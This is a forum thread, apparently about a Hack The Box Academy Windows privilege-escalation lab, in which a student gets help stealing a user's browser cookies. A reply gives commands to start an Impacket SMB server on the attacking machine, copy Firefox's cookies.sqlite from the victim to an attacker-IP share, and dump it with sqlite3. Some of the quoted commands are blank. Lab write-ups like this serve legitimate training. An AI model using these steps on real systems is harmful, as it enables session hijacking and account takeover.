HTB academy windows priv esc pillaging can't find grace's cookies help please

Hey, I can’t seem to find Grace’s cookies. Can someone point me in the right direction?
I tried the SharmChromium thing, but only get this…

1 Like

First, try to check if there are cookies saved in Firefox. Copy the Firefox SQLite file from Firefox to your attacking machine. Afterwards, you can use CookieExtractor or you can use SQLite3. If you prefer to use SQLite3 (seems to me a better option for small data), run the following command:

sudo apt install sqlite3

Then, open SQLite3 with the following command:


Once inside, you can list the available tables using the following command:


To perform a dump of the specific table, use the following command:

.dump <TABLE-NAME>

Thanks, but thats my issue. I have no way of getting the sqlite file to my attackbox and I can’t run the cookieextractor script on the target machine cause python’s not installed. got any other ideas?

1 Like

Why can’t you get the sqlite file to attackbox?

I don’t know how lol…, It’s not like I can just open a http server like in kali and I cant get file transfer to work in any of the rdp programs: remmina, xfreerdp, etc… and I don’t have permissions to share folders. If you know how, could you let me know? I’d appreciate it. I’ve been stuck on this for two or three days…

1 Like

In my case, when I need to transfer files, I usually create an SMB server using Impacket. I use the following command on the attacking machine:

sudo impacket-smbserver -smb2support fismathack $(pwd)

I have placed “fismathack”, which is the name of the shared folder. You can change it to another name, such as “CompData”. Actually, the name doesn’t matter. On the other hand, I used “$(pwd)” to get the current working path, so all files will be saved in your current path.

Subsequently, I used the following command on the victim machine:

Copy-Item -Path "C:\path\to\the\sqlite\cookie\file" -Destination "\\<IP-Attacker>\<Shared-Folder>"

You should have the “cookies.sqlite” file on your attacking machine.

To get the user’s cookie, you must use sqlite3 or cookieextractor. In my case, I prefer to use sqlite3, as I consider it a better option.

sqlite3 cookies.sqlite

See the tables


Then simply dumpee the table

.dump <TABLE-NAME>

holy ■■■■, you’re awesome! Thank you so much. I really appreciate it. I’ve struggling with this for a few days

1 Like

Glad to help :), if you have any questions please let me know.